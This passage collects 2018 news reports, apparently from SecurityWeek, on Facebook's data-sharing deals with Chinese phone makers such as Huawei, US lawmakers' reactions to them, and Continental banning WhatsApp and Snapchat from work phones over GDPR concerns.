Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

Senator Ed Markey said Facebook's chief executive has some more explaining to do following these revelations.

"Mark Zuckerberg needs to return to Congress and testify why @facebook shared Americans' private information with questionable Chinese companies," the Massachusetts Democrat said on Twitter.

"Our privacy and national security cannot be the cost of doing business."

Other lawmakers zeroed in on the concerns about Huawei's ties to the Chinese government, even though the company has denied the allegations.

"This could be a very big problem," tweeted Senator Marco Rubio, a Florida Republican.

"If @Facebook granted Huawei special access to social data of Americans this might as well have given it directly to the government of #China."

Representative Debbie Dingell called the latest news on Huawei "outrageous" and urged a new congressional probe.

"Why does Huawei, a company that our intelligence community said is a national security threat, have access to our personal information?" said Dingell, a Michigan Democrat, on Twitter.

"With over 184 million daily Facebook users in US & Canada, the potential impact on our privacy & national security is huge."

'Approved experiences'

Facebook, which has been blocked in China since 2009, also had data-access deals with Chinese companies Lenovo, OPPO and TCL, according to the company, which had similar arrangements with dozens of other devices makers.

Huawei, which has claimed national security fears are unfounded, said in an emailed statement its access was the same as other device makers.

"Like all leading smartphone providers, Huawei worked with Facebook to make Facebook's service more convenient for users. Huawei has never collected or stored any Facebook user data."

The revelations come weeks after Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 campaign.

Facebook said its contracts with phone makers placed tight limits on what could be done with data, and "approved experiences" were reviewed by engineers and managers before being deployed, according to the social network.

Any data obtained by Huawei "was stored on the device, not on Huawei's servers," according to Facebook mobile partnerships chief Francisco Varela.

Facebook said it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

It has argued the data-sharing with smartphone makers was different from the leak of data to Cambridge Analytica, which obtained private user data from a personality quiz designed by an academic researcher who violated Facebook's rules.

Facebook is winding up the interface arrangements with device makers as the company's smartphone apps now dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The news comes following US sanctions on another Chinese smartphone maker, ZTE -- which was not on the Facebook list -- for violating export restrictions to Iran.

The ZTE sanctions limiting access to US components could bankrupt the manufacturer, but Trump has said he is willing to help rescue the firm, despite objections from US lawmakers.


Germany's Continental Bans WhatsApp From Work Phones
6.6.2018 securityweek
Social

German car parts supplier Continental on Tuesday said it was banning the use of WhatsApp and Snapchat on work-issued mobile phones "with immediate effect" because of data protection concerns.

The company said such social media apps had "deficiencies" that made it difficult to comply with tough new EU data protection legislation, especially their insistence on having access to a user's contact list.

"Continental is prohibiting its employees from using social media apps like WhatsApp and Snapchat in its global company network, effective immediately," the firm said in a statement.

Some 36,000 employees would be affected by the move, a Continental spokesman told AFP.

The company, one of the world's leading makers of car parts, has over 240,000 staff globally.

A key principle of the European Union's new general data protection regulation (GDPR), which came into force on May 25, is that individuals must explicitly grant permission for their data to be used.

But Continental said that by demanding full access to address books, WhatsApp for example had shifted the burden onto the user, essentially expecting them to contact everyone in their phone to let them know their data was being shared.

"We think it is unacceptable to transfer to users the responsibility of complying with data protection laws," said Continental's CEO Elmar Degenhart.

The Hanover-based firm said it stood ready to reverse its decision once the service providers "change the basic settings to ensure that their apps comply with data-protection regulations by default".

The issue of how personal information is used and shared online was given fresh urgency after Facebook earlier this year admitted to a massive privacy breach that allowed a political consultancy linked to US President Donald Trump's 2016 campaign to harvest the data of up to 87 million users.


Facebook Says Chinese Phone Makers Got Access to Data
6.6.2018 securityweek
Social

Facebook on Tuesday confirmed that a Chinese phone maker deemed a national security threat by the US was among companies given access to data on users.

Huawei was able to access Facebook data to get the leading social network's applications to perform on smartphones, according to the California-based company.

"Facebook along with many other US tech companies have worked with them and other Chinese manufacturers to integrate their services onto these phones," Facebook mobile partnerships leader Francisco Varela said in a released statement.

"Given the interest from Congress, we wanted to make clear that all the information from these integrations with Huawei was stored on the device, not on Huawei's servers."

Facebook also had data access deals with Lenovo, OPPO and TCL of China, according to Varela.

"Facebook's integrations with Huawei, Lenovo, OPPO and TCL were controlled from the get go," Varela said.

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

"Concerns about Huawei aren't new," US Senator Mark Warner, vice chairman of the senate select committee on intelligence, said Tuesday in a released statement.

"I look forward to learning more about how Facebook ensured that information about their users was not sent to Chinese servers."

Facebook said that it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

Before now-ubiquitous apps standardized the social media experience on smartphones, some 60 device makers like Amazon, Apple, Blackberry, HTC, Microsoft and Samsung worked with Facebook to adapt interfaces for the Facebook website to their own phones, the company said.

Facebook said it is winding up the interface arrangements with device makers as the company's smartphone apps dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The social media leader said it "disagreed" with the conclusions of a New York Times report that found that the device makers could access information on Facebook users' friends without their explicit consent.

Facebook enabled device makers to interface with it at a time when it was building its service and they were developing new smartphone and social media technology.

But the report raised concerns that massive databases on users and their friends -- including personal data and photographs -- could be in the hands of device makers.